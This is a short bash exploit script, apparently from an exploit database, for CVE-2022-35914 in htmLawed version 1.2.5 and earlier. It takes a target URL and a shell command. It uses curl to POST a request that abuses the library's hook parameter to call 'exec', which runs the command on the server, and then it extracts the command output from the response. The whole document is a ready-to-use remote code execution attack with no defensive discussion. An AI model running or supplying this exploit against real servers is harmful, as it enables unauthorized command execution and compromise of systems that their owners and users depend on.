#!/bin/bash
# Exploit Title: htmlLawed <= 1.2.5 - Remote Code Execution
# Date: 2024-05-02
# Exploit Author: Miguel Redondo (aka d4t4s3c)
# Vendor Homepage: https://www.bioinformatics.org/phplabware/internal_utilities/htmLawed
# Software Link: https://github.com/kesar/HTMLawed
# Version: <= 1.2.5
# Tested on: Linux
# Category: Web Application
# CVE: CVE-2022-35914
while getopts ":u:c:" arg; do
case ${arg} in
u) url=${OPTARG}; let parameter_counter+=1 ;;
c) cmd=${OPTARG}; let parameter_counter+=1 ;;
esac
done
if [ -z "${url}" ] || [ -z "${cmd}" ]; then
echo -e "\n[*] htmlLawed <= 1.2.5 - Remote Code Execution"
echo -e "\n[-] Usage: CVE-2022-35914.sh -u <url> -c <cmd>\n"
exit 1
else
echo -e "\n[*] htmlLawed <= 1.2.5 - Remote Code Execution"
echo -e "\n[+] Executing Command: ${cmd}\n"
cmd_output=$(curl -s -d "sid=foo&hhook=exec&text=${cmd}" -b "sid=foo" ${url} | egrep '\ \[[0-9]+\] =\>' | sed -E 's/\ \[[0-9]+\] =\> (.*)<br \/>/\1/')
echo -e "${cmd_output}\n"
exit 0
fi